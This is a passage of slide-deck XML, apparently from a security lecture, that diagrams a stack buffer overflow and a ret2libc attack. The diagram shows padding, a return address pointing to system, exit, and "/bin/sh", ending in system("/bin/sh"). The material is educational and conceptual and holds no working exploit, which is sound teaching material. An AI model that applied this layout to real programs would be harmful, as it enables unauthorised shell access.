              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>mov ebp, esp</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>...(execute command)</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1456" name="Shape 1456"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="288252" y="3182797"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3510225" y="1324000"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1457" name="Shape 1457"/>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600" kern="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>%eip</a:t>
              </a:r>
              <a:endParaRPr sz="1600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="1458" name="Shape 1458"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4151625" y="1454200"/>
              <a:ext cx="484800" cy="6900"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1459" name="Shape 1459"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1789867" y="1763367"/>
            <a:ext cx="2882800" cy="182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t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>stack overflow:</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>push ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>mov ebp, esp</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="矩形 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E703D33-266A-4DA4-8429-64485256C9C2}"/>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ret2libc</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465" name="Shape 1465"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7106500" y="24940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"/bin/sh"</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1466" name="Shape 1466"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7106500" y="29036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exit</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1467" name="Shape 1467"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7106500" y="33132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system</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1468" name="Shape 1468"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7106500" y="37228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padding</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1469" name="Shape 1469"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7106500" y="4132467"/>
            <a:ext cx="2095200" cy="162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padding</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1470" name="Shape 1470"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7106500" y="20844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0</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1471" name="Shape 1471"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5671600" y="3111667"/>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b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>ESP</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1472" name="Shape 1472"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6568867" y="3316467"/>
            <a:ext cx="537600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1473" name="Shape 1473"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="9471400" y="2109200"/>
            <a:ext cx="21200" cy="3641200"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1474" name="Shape 1474"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9569833" y="3609433"/>
            <a:ext cx="1183600" cy="409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Overflow</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1475" name="Shape 1475"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9569833" y="2027400"/>
            <a:ext cx="2496800" cy="911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Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>system("/bin/sh")</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>exit(0)</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1476" name="Shape 1476"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1789867" y="3819267"/>
            <a:ext cx="2882800" cy="25044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t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>system:</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>push ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>mov ebp, esp</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>...(execute command)</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1477" name="Shape 1477"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="288252" y="4254879"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3510225" y="1324000"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1478" name="Shape 1478"/>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867" kern="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>%eip</a:t>
              </a:r>
              <a:endParaRPr sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="1479" name="Shape 1479"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4151625" y="1454200"/>
              <a:ext cx="484800" cy="6900"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="19050" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1480" name="Shape 1480"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1789867" y="1763367"/>
            <a:ext cx="2882800" cy="182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t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>stack overflow:</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>push ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>mov ebp, esp</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>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defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666"/>
              </a:highlight>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
